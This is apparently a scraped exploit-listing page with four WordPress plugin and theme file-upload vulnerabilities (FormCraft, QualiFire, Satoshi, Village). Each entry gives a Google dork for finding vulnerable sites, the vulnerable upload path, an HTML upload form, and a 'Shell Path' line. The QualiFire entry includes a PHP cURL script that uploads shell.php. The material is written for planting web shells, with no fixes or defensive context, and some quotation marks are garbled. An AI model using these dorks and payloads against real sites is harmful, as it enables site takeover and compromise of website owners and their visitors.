WordPress Plugins FromCraft File Upload

#- Title: WordPress Plugins FromCraft File Upload 

#- Author: -

#- Date: -

#- Developer : AndonDesign

#- Link Download : wordpress .org/plugins/formcraft-form-builder

#- Google Dork: inurl:"/plugins/formcraft/"

#- Fixed in Version : -

#- Tested on : win

=======================================================

-- Proof Of Concept --

Vulnerable : /wp-content/plugins/formcraft/file-upload/server/php/upload.php

When Vuln : {"files":

CSRF :

<form method=�POST� action=�http://victim. com/wp-content/plugins/formcraft/file-upload/server/php/upload.php�enctype=�multipart/form-data�><input type=�file� name=�files[]� /><button>Upload</button></form>

Shell Path : Here

Read more ...

Wordpress Themes QualiFire File Upload Vulnerability

#- Title: Wordpress Themes QualiFire File Upload Vulnerability

#- Author: Tn_Scorpion

#- Date: 01-07-2012

#- Developer : AndonDesign

#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879

#- Google Dork: inurl:"/themes/qualifire/"

#- Fixed in Version : -

#- Tested on : win

=======================================================

-- Proof Of Concept --

Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When Vuln : Blank

Remote file :

<?php

  

$uploadfile="shell.php";

$ch = curl_init("http://example .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

  

  print "$postResult";

?>

CSRF :

<form

action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"

method="post"

enctype="multipart/form-data">

<label for="file">Filename:</label>

<input type="file" name="Filedata" ><br>

<input type="submit" name="submit" value="Submit">

</form>

Shell Path : Here

Read more ...

Satoshi Theme - File Upload CSRF

#- Title: Satoshi Theme - File Upload CSRF

#- Author: Cyber_Taregh

#- Date: 2014-12-06

#- Developer : vooshtheme

#- Link Download : wpthemedownload .org/satoshi/

#- Google Dork: inurl:"/Themes/satoshi/"

#- Fixed in Version : -

#- Tested on : linux

======================================================

Classification

Type CSRF

OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)

CWE CWE-352

Miscellaneous

Submitter Anonymous

Views 750

Verified No

WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 

<form enctype="multipart/form-data"

action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">

Your File: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

If Succes  : Succes

Shell Path : Here

Read more ...

WordPress Village theme Arbitary File Upload

#- Title: WordPress Village theme Arbitary File Upload

#- Author: -

#- Date: 2014

#- Developer : ThemeProvince

#- Link Download : themeforest .net/item/village-a-responsive-fullscreen-wordpress-theme/237812

#- Google Dork: inurl:"/themes/village/"

#- Fixed in Version : -

#- Tested on : Windows 

======================================================

-- Proof Of Concept --

When Vuln :

{"error":"No files were uploaded."}

CSRF : 

<form enctype="multipart/form-data"

action="site .com/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php" method="post">

Your File: <input name="qqfile" type="file" /><br />

<input type="submit" value="upload" />

</form>

Shell Path : Here

Read more ...